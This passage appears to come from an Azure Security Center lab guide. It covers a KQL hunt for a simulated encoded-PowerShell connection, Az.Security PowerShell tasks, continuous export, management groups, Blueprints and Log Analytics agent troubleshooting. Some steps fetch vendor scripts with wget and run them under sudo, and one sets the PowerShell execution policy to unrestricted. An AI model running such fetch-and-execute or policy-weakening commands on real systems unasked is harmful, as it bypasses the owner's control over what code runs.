| project Computer, Application, SourceAddress, DestAddress
Page 201
The result of this query should reveal the destination IP address. One good practice is to verify
if there are other machines in your environment connecting to that particular IP address. This
could lead you to identify other systems that might be compromised. In the query below,
change the “x.x.x.x” for the destination IP address that you found in the previous query, and
click Run:
SecurityEvent
| where tostring(EventData) contains "X.X.X.X"
| project Computer, EventData
| extend X = parse_xml(EventData)
| extend Application = X.EventData.Data[1]["#text"]
| extend SourceAddress = X.EventData.Data[3]["#text"]
| extend DestAddress = X.EventData.Data[5]["#text"] | project Application,
SourceAddress, DestAddress
In this case, since we are using only one VM, you should only see one result, which is the VM
where you ran the encoded PowerShell command.
Page 202
12 PowerShell Automation of ASC Tasks
12.1 Install the ASC PowerShell module

Azure Security Center’s new PowerShell module is integrated into the new Az-* Azure
PowerShell modules which replace the older AzureRM modules.
For more information on this replacement see here: https://azure.microsoft.com/en-

us/blog/azure-powershell-cross-platform-az-module-replacing-azurerm/ and
https://azure.microsoft.com/en-us/blog/azure-powershell-az-module-version-1/
1. Launch an elevated PowerShell window

2. Type: install-module az.security -allowclobber
12.2 Run module to get alerts

1. Open a new PowerShell Console
2. Type: Set-ExecutionPolicy unrestricted (Normally unrestricted isn’t recommended but
this is a test environment. For a production environment please set per company policy)
3. Type: Import-Module az.accounts
Note: (be sure to note the warning and instructions – you will go to a URL and paste in
the provided device code to enter your PS session)
4. Run get-azsecurityalert | ft *display*,*time*
Page 203
12.3 Setting Security Contact Details Across Mulitple
Subscriptions (optional)
For customers that have many subscriptions, we can use PowerShell to loop through all the
subscriptions available to that user and update the security contact details with the following PS:
#auth to azure
Login-AzAccount
#loop through all subscriptions

Get-AzContext -ListAvailable -PipelineVariable AzureRMSub | Set-AzContext | foreach{
Set-AzSecurityContact -Email "security@contoso.com" -NotifyOnAlert -phone "555-555-
5555" -Name 'default1' -AlertAdmin}
Page 204
13 Continuously export Security Center data
Azure Security Center generates detailed security alerts and recommendations. You can view
them in the portal or through programmatic tools. You might also need to export some or all of
this information for tracking with other monitoring tools in your environment.
Continuous export lets you fully customize what will be exported, and where it will go. For
example, you can configure it so that:
• All high severity alerts are sent to an Azure Event Hub

• All medium or higher severity findings from vulnerability assessment scans of your
SQL servers are sent to a specific Log Analytics workspace
• Specific recommendations are delivered to an Event Hub or Log Analytics
workspace whenever they're generated
Generally it’s recommended to collect and correlate security events in a single Security Incident
and Event Management system (SIEM). Integration with Microsoft cloud-based SIEM Azure
Sentinel could be enabled by single as Azure Security Center connector is built-in.
Page 205
To integrate with other SIEM you can get additional details following the links below:
• Splunk - Use the Azure Monitor Add-On for Splunk

• IBM QRadar - Use a manually configured log source
• ArcSight – Use SmartConnector
Page 206
14 Management Groups
Overview
Please refer to https://docs.microsoft.com/en-us/azure/governance/management-groups/ for
more information.
Create a management group structure

Draft with the customer a hierarchy that would be a good start point for them based on their
current requirements. Refer to the link in previous section or show them the sample structure
below for reference:
10. Launch the Management Groups service in Azure portal by clicking All services,
then searching for and selecting Management Groups.
11. Click Add Management Group to create the desired structure.
12. Once created, navigate to the Tenant Root Group, click the elipsis next to your
subscription, select Move.
13. Select the desired level in the hierarchy to move your subscription.
Page 207
Create a hierarchy so you can apply a policy, for example, limit VM locations to US West
Region on the group "Production". This policy will inherit onto both EA subscriptions
under that management group and will apply to all VMs under those subscriptions.
Page 208
15 Blueprints
Overview
Please refer to https://docs.microsoft.com/en-us/azure/governance/blueprints/overview for
more information.
Azure Blueprints helps you deploy and update cloud environments in a repeatable manner using
composable artifacts such as Azure Resource Manager templates to provision resources, role-
based access controls, and policies.
How it's different from Azure Policy

A blueprint is a package or container for composing focus-specific sets of standards, patterns,
and requirements related to the implementation of Azure cloud services, security, and design
that can be reused to maintain consistency and compliance.
A policy is a default allow and explicit deny system focused on resource properties during
deployment and for already existing resources. It supports cloud governance by validating that
resources within a subscription adhere to requirements and standards.
Including a policy in a blueprint enables the creation of the right pattern or design during
assignment of the blueprint. The policy inclusion makes sure that only approved or expected
changes can be made to the environment to protect ongoing compliance to the intent of the
blueprint.
A policy can be included as one of many artifacts in a blueprint definition. Blueprints also
support using parameters with policies and initiatives.
Blueprint definition locations

When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can
be saved to a management group or subscription that you have Contributor access to. If the
location is a management group, the blueprint is available to assign to any child subscription of
that management group.
Page 209
Blueprint parameters
Blueprints can pass parameters to either a policy/initiative or an Azure Resource Manager
template. When adding either artifact to a blueprint, the author decides to provide a defined
value for each blueprint assignment or to allow each blueprint assignment to provide a value at
assignment time. This flexibility provides the option to define a pre-determined value for all uses
of the blueprint or to enable that decision to be made at the time of assignment.
Create a Blueprint
1 Click on All services and searching for and selecting Policy in the left pane. On the Policy
page, click on Blueprints.
2 Select Blueprint Definitions from the page on the left and click the + Create Blueprint
button at the top of the page.
3 Enter a name, description, and in the Definition Location box, click the ellipsis on the right,
select the desired management group and click Select.
4 Click Next: Artifacts at the bottom of the page.
5 Start adding the desired artifacts. As a first example, add a Role Assignment at the
subscription level to define RBAC permissions.
Page 210
6 Once finished, click Save draft.
7 Select Blueprint Definitions from the page on the left.
8 In the list of blueprints, right-click on the one you previously created and select Publish
Blueprint.
9 On the dialog that opens, provide a Version (letters, numbers, and hyphens with a max
length of 20 characters) such as 'v1' and Change notes (optional) such as 'First publish'.
10 Click Publish at the bottom of the page.
Assign a blueprint
Once a blueprint has been published, it can be assigned to a subscription. Assign the blueprint
you created to one of the subscriptions in your management group hierarchy.
11 Select Blueprint Definitions from the page on the left.

12 In the list of blueprints, right-click on the one you previously created (or left-click on the
ellipsis) and select Assign Blueprint.
13 On the Assign Blueprint page, select the subscription(s) you want to deploy this blueprint
to from the Subscription drop-down.
Note
An assignment is created for each subscription that is selected allowing changes to a
single subscription assignment at a later time without forcing changes on the remainder
of the selected subscriptions.
Page 211
14 For Assigned Name, provide a unique name for this assignment.
15 In Location, select a region for the managed identity to be created in. Azure Blueprint uses
this managed identity to deploy all artifacts in the assigned blueprint.
16 Leave the Blueprint definition version drop-down of Published versions on the 'v1' entry
(default as the most recently Published version).
17 For Lock Assignment, leave the default of Don't Lock.
18 For the subscription level role assignment [User group or application name] :
Contributor, search for and select a user, app, or group.
19 For the subscription level policy assignment, set the Tag Name to 'CostCenter' and the Tag
Value to the desired value.
20 For the 'ResourceGroup', provide a Name of 'StorageAccount' and a Location from the
drop-down.
21 On the Azure Resource Manager template 'StorageAccount', select 'Standard_GRS' for the
storageAccountType parameter.
22 Read the information box at the bottom of the page and then click Assign.
Track deployment of a blueprint

When a blueprint has been assigned to one or more subscriptions, two things happen:
• The blueprint is added to the Assigned Blueprints page per subscription assigned to
• The process of deploying all the artifacts defined by the blueprint begins
Now that the blueprint has been assigned to a subscription, verify progress of the deployment.
23 Select Assigned Blueprints from the page on the left.

24 In the list of blueprints, right-click on the one you previously assigned and select View
Assignment Details.
Page 212
Page 213
16 Troubleshoot
16.1 Log Analytics agent for Windows

This information provides help troubleshooting errors you might experience with the Log
Analytics agent for Windows in Azure Monitor and suggests possible solutions to resolve them.
If none of these steps work for you, the following support channels are also available:
• Customers with Premier support benefits can open a support request with Premier.
• Customers with Azure support agreements can open a support request in the
Azure portal.
• Visit the Log Analytics Feedback page to review submitted ideas and
bugs https://aka.ms/opinsightsfeedback or file a new one.
Important troubleshooting sources
To assist with troubleshooting issues related to Log Analytics agent for Windows, the agent logs
events to the Windows Event Log, specifically under Application and Services\Operations
Manager.
Connectivity issues
If the agent is communicating through a proxy server or firewall, there may be restrictions in
place preventing communication from the source computer and the Azure Monitor service. In
case communication is blocked, because of misconfiguration, registration with a workspace
might fail while attempting to install the agent or configure the agent post-setup to report to an
additional workspace. Agent communication may fail after successful registration. This section
describes the methods to troubleshoot this type of issue with the Windows agent.
Double check that the firewall or proxy is configured to allow the following ports and URLs
described in the following table. Also confirm HTTP inspection is not enabled for web traffic, as
it can prevent a secure TLS channel between the agent and Azure Monitor.
Page 214
Agent Resource Ports Direction Bypass HTTPS inspection
*.ods.opinsights.azure.com Port 443 Outbound Yes
*.oms.opinsights.azure.com Port 443 Outbound Yes
*.blob.core.windows.net Port 443 Outbound Yes
*.agentsvc.azure-automation.net Port 443 Outbound Yes
For firewall information required for Azure Government, see Azure Government management. If
you plan to use the Azure Automation Hybrid Runbook Worker to connect to and register with
the Automation service to use runbooks or management solutions in your environment, it must
have access to the port number and the URLs described in Configure your network for the
Hybrid Runbook Worker.
There are several ways you can verify if the agent is successfully communicating with Azure
Monitor.
• Enable the Azure Log Analytics Agent Health assessment in the workspace. From
the Agent Health dashboard, view the Count of unresponsive agents column to
quickly see if the agent is listed.
• Run the following query to confirm the agent is sending a heartbeat to the
workspace it is configured to report to. Replace <ComputerName> with the actual
name of the machine.
Heartbeat
| where Computer like "<ComputerName>"
| summarize arg_max(TimeGenerated, * ) by Computer
• If the computer is successfully communicating with the service, the query should
return a result. If the query did not return a result, first verify the agent is
configured to report to the correct workspace. If it is configured correctly, proceed
to step 3 and search the Windows Event Log to identify if the agent is logging
what issue might be preventing it from communicating with Azure Monitor.
• Another method to identify a connectivity issue is by running
the TestCloudConnectivity tool. The tool is installed by default with the agent in
Page 215
the folder %SystemRoot%\Program Files\Microsoft Monitoring Agent\Agent. From
an elevated command prompt, navigate to the folder and run the tool. The tool
returns the results and highlights where the test failed (for example, if it was
related to a particular port/URL that was blocked).
Filter the Operations Manager event log by Event sources - Health Service
Modules, HealthService, and Service Connector and filter by Event Level Warning and Error to
confirm if it has written events from the following table. If they are, review the resolution steps
included for each possible event.
Event Source Description Resolution

ID
2133 & Health Connection to the This error can occur when the agent cannot
2129 Service service from the communicate directly or through a firewall/proxy
agent failed server to the Azure Monitor service. Verify agent
proxy settings or that the network firewall/proxy
Page 216
allows TCP traffic from the computer to the
service.
2138 Health Proxy requires Configure the agent proxy settings and specify
Service authentication the username/password required to authenticate
Modules with the proxy server.
2129 Health Failed Check your network adapter TCP/IP settings and
Service connection/Failed agent proxy settings.
Modules TLS negotiation
2127 Health Failure sending data If it only happens periodically during the day, it
Service received error code could just be a random anomaly that can be
Modules ignored. Monitor to understand how often it
happens. If it happens often throughout the day,
first check your network configuration and proxy
settings. If the description includes HTTP error
code 404 and it's the first time that the agent
tries to send data to the service, it will include a
500 error with an inner 404 error code. 404
means not found, which indicates that the
storage area for the new workspace is still being
provisioned. On next retry, data will successfully
write to the workspace as expected. An HTTP
error 403 might indicate a permission or
credentials issue. There is more information
included with the 403 error to help troubleshoot
the issue.
4000 Service DNS name The machine could not resolve the Internet
Connector resolution failed address used when sending data to the service.
This might be DNS resolver settings on your
machine, incorrect proxy settings, or maybe a
temporary DNS issue with your provider. If it
Page 217
happens periodically, it could be caused by a
transient network-related issue.
4001 Service Connection to the This error can occur when the agent cannot
Connector service failed. communicate directly or through a firewall/proxy
server to the Azure Monitor service. Verify agent
proxy settings or that the network firewall/proxy
allows TCP traffic from the computer to the
service.
4002 Service The service returned This error is written during the agent’s initial
Connector HTTP status code registration phase and you’ll see a URL similar to
403 in response to a the
query. Check with following: https://<workspaceID>.oms.opinsights.
the service azure.com/AgentService.svc/AgentTopologyReque
administrator for st. An error code 403 means forbidden and can
the health of the be caused by a mistyped Workspace ID or key, or
service. The query the data and time is incorrect on the computer. If
will be retried later. the time is +/- 15 minutes from current time,
then onboarding fails. To correct this, update the
date and/or timezone of your Windows
computer.
Data collection issues
After the agent is installed and reports to its configured workspace or workspaces, it may stop
receiving configuration, collecting or forwarding performance, logs, or other data to the service
depending on what is enabled and targeting the computer. It is necessary to determine if:
• Is it a particular data type or all data that is not available in the workspace?
• Is the data type specified by a solution or specified as part of the workspace data
collection configuration?
• How many computers are affected? Is it a single or multiple computers reporting to the
workspace?
• Was it working and did it stop at a particular time of day, or has it never been collected?
Page 218
• Is the log search query you are using syntactically correct?
• Has the agent ever received its configuration from Azure Monitor?
The first step in troubleshooting is to determine if the computer is sending a heartbeat event.
Heartbeat
| where Computer like "<ComputerName>"
| summarize arg_max(TimeGenerated, * ) by Computer
If the query returns results, then you need to determine if a particular data type is not collected
and forwarded to the service. This could be caused by the agent not receiving updated
configuration from the service, or some other symptom preventing the agent from operating
normally. Perform the following steps to further troubleshoot.
1. Open an elevated command prompt on the computer and restart the agent service by
typing net stop healthservice && net start healthservice.
2. Open the Operations Manager event log and search for event IDs 7023, 7024, 7025,
7028 and 1210 from Event source HealthService. These events indicate the agent is
successfully receiving configuration from Azure Monitor and they are actively monitoring
the computer. The event description for event ID 1210 will also specify on the last line all
of the solutions and Insights that are included in the scope of monitoring on the agent.
If after several minutes you do not see the expected data in the query results or visualization,
depending on if you are viewing the data from a solution or Insight, from the Operations
Manager event log, search for Event sources HealthService and Health Service Modules and filter
by Event Level Warning and Error to confirm if it has written events from the following table.
Page 219
Event ID Source Description Resolution
8000 HealthService This event will specify if a Event ID 2136 from source HealthService is
workflow related to written together with this event and can
performance, event, or indicate the agent is unable to communicate
other data type collected with the service, possibly due to
is unable to forward to the misconfiguration of the proxy and
service for ingestion to the authentication settings, network outage, or
workspace. the network firewall/proxy does not allow TCP
traffic from the computer to the service.
10102 Health Workflow could not This can occur if the specified performance
and Service resolve data source. counter or instance does not exist on the
10103 Modules computer or is incorrectly defined in the
workspace data settings. If this is a user-
specified performance counter, verify the
information specified is following the correct
format and exists on the target computers.
26002 Health Workflow could not This can occur if the specified Windows event
Service resolve data source. log does not exist on the computer. This error
Modules can be safely ignored if the computer is not
expected to have this event log registered,
otherwise if this is a user-specified event log,
verify the information specified is correct.
16.2 Log Analytics agent for Linux

This information provides help troubleshooting errors you might experience with the Log
Analytics agent for Linux in Azure Monitor and suggests possible solutions to resolve them.
If none of these steps work for you, the following support channels are also available:
• Customers with Premier support benefits can open a support request with Premier.
Page 220
• Customers with Azure support agreements can open a support request in the Azure
portal.
• Diagnose OMI Problems with the OMI troubleshooting guide.
• File a GitHub Issue.
• Visit the Log Analytics Feedback page to review submitted ideas and
bugs https://aka.ms/opinsightsfeedback or file a new one.
How to Use
The Troubleshooting Tool can be run by pasting the following command into a terminal window
on a machine with the Log Analytics agent: sudo /opt/microsoft/omsagent/bin/troubleshooter
Manual Installation
The Troubleshooting Tool is automatically included upon installation of the Log Analytics Agent.
However, if installation fails in any way, it can also be installed manually by following the steps
below.
1. Copy the troubleshooter bundle onto your machine: wget
https://raw.github.com/microsoft/OMS-Agent-for-
Linux/master/source/code/troubleshooter/omsagent_tst.tar.gz
2. Unpack the bundle: tar -xzvf omsagent_tst.tar.gz
3. Run the manual installation: sudo ./install_tst
Scenarios Covered
Below is a list of scenarios checked by the Troubleshooting Tool:

1. Agent is unhealthy, heartbeat doesn't work properly
2. Agent doesn't start, can't connect to Log Analytic Services
3. Agent syslog isn't working
4. Agent has high CPU / memory usage
5. Agent having installation issues
6. Agent custom logs aren't working
7. Collect Agent logs
For more details, please check out our Github documentation.

Important: Please run the Log Collector tool when you experience an issue. Having the logs
initially will greatly help our support team troubleshoot your issue quicker.
Page 221
Purge and Re-Install the Linux Agent
We've seen that a clean re-install of the Agent will fix most issues. In fact this may be the first
suggestion from Support to get the Agent into a uncurropted state from our support team.
Running the troubleshooter, log collect, and attempting a clean re-install will help solve issues
more quickly.
1. Download the purge script:
• $ wget https://raw.githubusercontent.com/microsoft/OMS-Agent-for-
Linux/master/tools/purge_omsagent.sh
2. Run the purge script (with sudo permissions):
• $ sudo sh purge_omsagent.sh
Important log locations and Log Collector tool
File Path
Log Analytics agent for Linux log file /var/opt/microsoft/omsagent/<workspace

id>/log/omsagent.log
Log Analytics agent configuration log file /var/opt/microsoft/omsconfig/omsconfig.log
We recommend you to use our log collector tool to retrieve important logs for troubleshooting
or before submitting a GitHub issue. You can read more about the tool and how to run it here.
Important configuration files
Category File Location
Syslog /etc/syslog-ng/syslog-
ng.conf or /etc/rsyslog.conf or /etc/rsyslog.d/95-
omsagent.conf
Performance, Nagios, Zabbix, Log Analytics /etc/opt/microsoft/omsagent/<workspace

output and general agent id>/conf/omsagent.conf
Additional configurations /etc/opt/microsoft/omsagent/<workspace

id>/conf/omsagent.d/*.conf
Important: Editing configuration files for performance counters and Syslog is overwritten if the
collection is configured from the data menu Log Analytics Advanced Settings in the Azure portal
for your workspace. To disable configuration for all agents, disable collection from Log
Analytics Advanced Settings or for a single agent run the following:
Page 222
sudo su omsagent -c 'python /opt/microsoft/omsconfig/Scripts/OMS_MetaConfigHelper.py --
disable'
Installation error codes
Error Code Meaning
NOT_DEFINED Because the necessary dependencies are not installed, the auoms auditd
plugin will not be installed
2 Invalid option provided to the shell bundle. Run sudo sh ./omsagent-*.universal*.sh --

help for usage
3 No option provided to the shell bundle. Run sudo sh ./omsagent-*.universal*.sh --

help for usage.
4 Invalid package type OR invalid proxy settings; omsagent-rpm.sh packages

can only be installed on RPM-based systems, and omsagent-deb.sh packages
can only be installed on Debian-based systems. It is recommend you use the
universal installer from the latest release. Also review to verify your proxy
settings.
5 The shell bundle must be executed as root OR there was 403 error returned
during onboarding. Run your command using sudo.
6 Invalid package architecture OR there was error 200 error returned during
onboarding; omsagent-x64.sh packages can only be installed on 64-bit systems,
and omsagent-x86.sh packages can only be installed on 32-bit systems.
Download the correct package for your architecture from the latest release.
17 Installation of OMS package failed. Look through the command output for the
root failure.
19 Installation of OMI package failed. Look through the command output for the
root failure.
Page 223
20 Installation of SCX package failed. Look through the command output for the
root failure.
21 Installation of Provider kits failed. Look through the command output for the
root failure.
22 Installation of bundled package failed. Look through the command output for
the root failure
23 SCX or OMI package already installed. Use --upgrade instead of --install to install
the shell bundle.
30 Internal bundle error. File a GitHub Issue with details from the output.
55 Unsupported openssl version OR Cannot connect to Azure Monitor OR dpkg

is locked OR missing curl program.
61 Missing Python ctypes library. Install the Python ctypes library or package
(python-ctypes).
62 Missing tar program, install tar.
63 Missing sed program, install sed.
64 Missing curl program, install curl.
65 Missing gpg program, install gpg.
Onboarding error codes
Error Meaning
Code
2 Invalid option provided to the omsadmin script. Run

sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -h for usage.
Page 224
3 Invalid configuration provided to the omsadmin script. Run sudo sh
/opt/microsoft/omsagent/bin/omsadmin.sh -h for usage.
4 Invalid proxy provided to the omsadmin script. Verify the proxy and see
our documentation for using an HTTP proxy.
5 403 HTTP error received from Azure Monitor. See the full output of the omsadmin
script for details.
6 Non-200 HTTP error received from Azure Monitor. See the full output of the
omsadmin script for details.
7 Unable to connect to Azure Monitor. See the full output of the omsadmin script
for details.
8 Error onboarding to Log Analytics workspace. See the full output of the omsadmin
script for details.
30 Internal script error. File a GitHub Issue with details from the output.
31 Error generating agent ID. File a GitHub Issue with details from the output.
32 Error generating certificates. See the full output of the omsadmin script for details.
33 Error generating metaconfiguration for omsconfig. File a GitHub Issue with details
from the output.
34 Metaconfiguration generation script not present. Retry onboarding with

sudo sh /opt/microsoft/omsagent/bin/omsadmin.sh -w <Workspace ID> -s <Workspace Key>.
Enable debug logging
OMS output plugin debug
FluentD allows for plugin-specific logging levels allowing you to specify different log levels for
inputs and outputs. To specify a different log level for OMS output, edit the general agent
configuration at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf.
Page 225
In the OMS output plugin, before the end of the configuration file, change
the log_level property from info to debug:
<match oms.** docker.**>

type out_oms
log_level debug
num_threads 5
buffer_chunk_limit 5m
buffer_type file
buffer_path /var/opt/microsoft/omsagent/<workspace id>/state/out_oms*.buffer
buffer_queue_limit 10
flush_interval 20s
retry_limit 10
retry_wait 30s
</match>
Debug logging allows you to see batched uploads to Azure Monitor separated by type, number
of data items, and time taken to send:
Example debug enabled log:
Success sending oms.nagios x 1 in 0.14s

Success sending oms.omi x 4 in 0.52s
Success sending oms.syslog.authpriv.info x 1 in 0.91s
Verbose output
Instead of using the OMS output plugin you can also output data items directly to stdout, which
is visible in the Log Analytics agent for Linux log file.
In the Log Analytics general agent configuration file

at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf, comment out the OMS
output plugin by adding a # in front of each line:
#<match oms.** docker.**>

# type out_oms
# log_level info
# num_threads 5
Page 226
# buffer_chunk_limit 5m
# buffer_type file
# buffer_path /var/opt/microsoft/omsagent/<workspace id>/state/out_oms*.buffer
# buffer_queue_limit 10
# flush_interval 20s
# retry_limit 10
# retry_wait 30s
#</match>
Below the output plugin, uncomment the following section by removing the # in front of each
line:
<match **>
type stdout
</match>
Issues and Resolutions

Issue: Unable to connect through proxy to Azure Monitor
Probable causes
• The proxy specified during onboarding was incorrect

• The Azure Monitor and Azure Automation Service Endpoints are not included in
the approved list in your datacenter
Resolution
1. Re-onboard to Azure Monitor with the Log Analytics agent for Linux by using the
following command with the option -v enabled. It allows verbose output of the
agent connecting through the proxy to Azure
Monitor. /opt/microsoft/omsagent/bin/omsadmin.sh -w <Workspace ID> -s
<Workspace Key> -p <Proxy Conf> -v
2. Review the section Update proxy settings to verify you have properly configured
the agent to communicate through a proxy server.
Page 227
3. Double-check that the endpoints outlined in the Azure Monitor network firewall
requirements list are added to an allow list correctly. If you use Azure Automation,
the necessary network configuration steps are linked above as well.
Issue: You receive a 403 error when trying to onboard
Probable causes
• Date and Time is incorrect on Linux Server

• Workspace ID and Workspace Key used are not correct
Resolution
1. Check the time on your Linux server with the command date. If the time is +/- 15
minutes from current time, then onboarding fails. To correct this update the date
and/or timezone of your Linux server.
2. Verify you have installed the latest version of the Log Analytics agent for Linux. The
newest version now notifies you if time skew is causing the onboarding failure.
3. Reonboard using correct Workspace ID and Workspace Key following the
installation instructions earlier in this article.
Issue: You see a 500 and 404 error in the log file right after onboarding
This is a known issue that occurs on first upload of Linux data into a Log Analytics workspace.
This does not affect data being sent or service experience.
Issue: You see omiagent using 100% CPU
Probable causes
A regression in nss-pem package v1.0.3-5.el7 caused a severe performance issue, that we've
been seeing come up a lot in Redhat/Centos 7.x distributions. To learn more about this issue,
check the following documentation: Bug 1667121 Performance regression in libcurl.
Performance related bugs don't happen all the time, and they are very difficult to reproduce. If
you experience such issue with omiagent you should use the script omiHighCPUDiagnostics.sh
which will collect the stack trace of the omiagent when exceeding a certain threshold.
1. Download the script

wget https://raw.githubusercontent.com/microsoft/OMS-Agent-for-
Linux/master/tools/LogCollector/source/omiHighCPUDiagnostics.sh
2. Run diagnostics for 24 hours with 30% CPU threshold
bash omiHighCPUDiagnostics.sh --runtime-in-min 1440 --cpu-threshold 30
Page 228
3. Callstack will be dumped in omiagent_trace file, If you notice many Curl and NSS
function calls, follow resolution steps below.
Resolution (step by step)
1. Upgrade the nss-pem package to v1.0.3-5.el7_6.1.

sudo yum upgrade nss-pem
2. If nss-pem is not available for upgrade (mostly happens on Centos), then
downgrade curl to 7.29.0-46. If by mistake you run "yum update", then curl will be
upgraded to 7.29.0-51 and the issue will happen again.
sudo yum downgrade curl libcurl
3. Restart OMI:
sudo scxadmin -restart
Issue: You are not seeing any data in the Azure portal
Probable causes
• Onboarding to Azure Monitor failed

• Connection to Azure Monitor is blocked
• Log Analytics agent for Linux data is backed up
Resolution
1. Check if onboarding Azure Monitor was successful by checking if the following file
exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf
2. Reonboard using the omsadmin.sh command-line instructions
3. If using a proxy, refer to the proxy resolution steps provided earlier.
4. In some cases, when the Log Analytics agent for Linux cannot communicate with
the service, data on the agent is queued to the full buffer size, which is 50 MB. The
agent should be restarted by running the following
command: /opt/microsoft/omsagent/bin/service_control restart [<workspace id>].
Important: This issue is fixed in agent version 1.1.0-28 and later.
Issue: You are not seeing forwarded Syslog messages
Probable causes
• The configuration applied to the Linux server does not allow collection of the sent
facilities and/or log levels
• Syslog is not being forwarded correctly to the Linux server
• The number of messages being forwarded per second are too great for the base
configuration of the Log Analytics agent for Linux to handle
Page 229
Resolution
• Verify the configuration in the Log Analytics workspace for Syslog has all the
facilities and the correct log levels. Review configure Syslog collection in the Azure
portal
• Verify the native syslog messaging daemons (rsyslog, syslog-ng) are able to receive
the forwarded messages
• Check firewall settings on the Syslog server to ensure that messages are not being
blocked
• Simulate a Syslog message to Log Analytics using logger command
o logger -p local0.err "This is my test message"
Issue: You are receiving Errno address already in use in omsagent log file
If you see [error]: unexpected error error_class=Errno::EADDRINUSE

error=#<Errno::EADDRINUSE: Address already in use - bind(2) for "127.0.0.1" port 25224> in
omsagent.log.
Probable causes
This error indicates that the Linux Diagnostic extension (LAD) is installed side by side with the
Log Analytics Linux VM extension, and it is using same port for syslog data collection as
omsagent.
Resolution
1. As root, execute the following commands (note that 25224 is an example and it is
possible that in your environment you see a different port number used by LAD):
Copy
/opt/microsoft/omsagent/bin/configure_syslog.sh configure LAD 25229
sed -i -e 's/25224/25229/' /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/sys

log.conf
You then need to edit the correct rsyslogd or syslog_ng config file and change the
LAD-related configuration to write to port 25229.
Page 230
2. If the VM is running rsyslogd, the file to be modified is: /etc/rsyslog.d/95-
omsagent.conf (if it exists, else /etc/rsyslog). If the VM is running syslog_ng, the file
to be modified is: /etc/syslog-ng/syslog-ng.conf.
3. Restart omsagent sudo /opt/microsoft/omsagent/bin/service_control restart.
4. Restart syslog service.
Issue: You are unable to uninstall omsagent using purge option
Probable causes
• Linux Diagnostic Extension is installed

• Linux Diagnostic Extension was installed and uninstalled, but you still see an error
about omsagent being used by mdsd and cannot be removed.
Resolution
1. Uninstall the Linux Diagnostic Extension (LAD).

2. Remove Linux Diagnostic Extension files from the machine if they are present in
the following
location: /var/lib/waagent/Microsoft.Azure.Diagnostics.LinuxDiagnostic-
<version>/ and /var/opt/microsoft/omsagent/LAD/.
3.
Issue: You cannot see data any Nagios data
Probable causes
• Omsagent user does not have permissions to read from Nagios log file
• Nagios source and filter have not been uncommented from omsagent.conf file
Resolution
1. Add omsagent user to read from Nagios file by following these instructions.
2. In the Log Analytics agent for Linux general configuration file
at /etc/opt/microsoft/omsagent/<workspace id>/conf/omsagent.conf, ensure
that both the Nagios source and filter are uncommented.
Copy
<source>
type tail
path /var/log/nagios/nagios.log
format none
Page 231
tag oms.nagios
</source>
<filter oms.nagios>
type filter_nagios_log
</filter>
Issue: You are not seeing any Linux data
Probable causes
• Onboarding to Azure Monitor failed

• Connection to Azure Monitor is blocked
• Virtual machine was rebooted
• OMI package was manually upgraded to a newer version compared to what was
installed by Log Analytics agent for Linux package
• DSC resource logs class not found error in omsconfig.log log file
• Log Analytics agent for data is backed up
• DSC logs Current configuration does not exist. Execute Start-DscConfiguration
command with -Path parameter to specify a configuration file and create a current
configuration first. in omsconfig.log log file, but no log message exists
about PerformRequiredConfigurationChecks operations.
Resolution
1. Install all dependencies like auditd package.

2. Check if onboarding to Azure Monitor was successful by checking if the following
file exists: /etc/opt/microsoft/omsagent/<workspace id>/conf/omsadmin.conf. If it
was not, reonboard using the omsadmin.sh command line instructions.
3. If using a proxy, check proxy troubleshooting steps above.
4. In some Azure distribution systems, omid OMI server daemon does not start after
the virtual machine is rebooted. This will result in not seeing Audit,
ChangeTracking, or UpdateManagement solution-related data. The workaround is
to manually start omi server by running sudo /opt/omi/bin/service_control restart.
5. After OMI package is manually upgraded to a newer version, it has to be manually
restarted for Log Analytics agent to continue functioning. This step is required for
some distros where OMI server does not automatically start after it is upgraded.
Run sudo /opt/omi/bin/service_control restart to restart OMI.
6. If you see DSC resource class not found error in omsconfig.log, run sudo
/opt/omi/bin/service_control restart.
Page 232
7. In some cases, when the Log Analytics agent for Linux cannot talk to Azure
Monitor, data on the agent is backed up to the full buffer size: 50 MB. The agent
should be restarted by running the following
command /opt/microsoft/omsagent/bin/service_control restart.
Note
This issue is fixed in Agent version 1.1.0-28 or later
• If omsconfig.log log file does not indicate

that PerformRequiredConfigurationChecks operations are running periodically on
the system, there might be a problem with the cron job/service. Make sure cron
job exists under /etc/cron.d/OMSConsistencyInvoker. If needed run the following
commands to create the cron job:
mkdir -p /etc/cron.d/
echo "*/15 * * * * omsagent /opt/omi/bin/OMSConsistencyInvoker >/dev/null 2>&
1" | sudo tee /etc/cron.d/OMSConsistencyInvoker
Also, make sure the cron service is running. You can use service cron status with
Debian, Ubuntu, SUSE, or service crond status with RHEL, CentOS, Oracle Linux to
check the status of this service. If the service does not exist, you can install the
binaries and start the service using the following:
Ubuntu/Debian
# To Install the service binaries
sudo apt-get install -y cron
# To start the service

sudo service cron start
SUSE
sudo zypper in cron -y

sudo systemctl enable cron
Page 233
sudo systemctl start cron
RHEL/CeonOS

sudo yum install -y crond
sudo service crond start
Oracle Linux
sudo yum install -y cronie

sudo service crond start
Issue: When configuring collection from the portal for Syslog or Linux performance
counters, the settings are not applied
Probable causes
• The Log Analytics agent for Linux has not picked up the latest configuration
• The changed settings in the portal were not applied
Resolution
Background: omsconfig is the Log Analytics agent for Linux configuration agent that looks for
new portal-side configuration every five minutes. This configuration is then applied to the Log
Analytics agent for Linux configuration files located at
/etc/opt/microsoft/omsagent/conf/omsagent.conf.
• In some cases, the Log Analytics agent for Linux configuration agent might not be able
to communicate with the portal configuration service resulting in latest configuration not
being applied.
1. Check that the omsconfig agent is installed by running dpkg --list omsconfig or rpm -qi
omsconfig. If it is not installed, reinstall the latest version of the Log Analytics agent for
Linux.
Page 234
2. Check that the omsconfig agent can communicate with Azure Monitor by running the
following command sudo su omsagent -c 'python
/opt/microsoft/omsconfig/Scripts/GetDscConfiguration.py'. This command returns the
configuration that agent receives from the service, including Syslog settings, Linux
performance counters, and custom logs. If this command fails, run the following
command sudo su omsagent -c 'python
/opt/microsoft/omsconfig/Scripts/PerformRequiredConfigurationChecks.py'. This
command forces the omsconfig agent to talk to Azure Monitor and retrieve the latest
configuration.
Issue: You are not seeing any custom log data
Probable causes
• Onboarding to Azure Monitor failed.

• The setting Apply the following configuration to my Linux Servers has not been
selected.
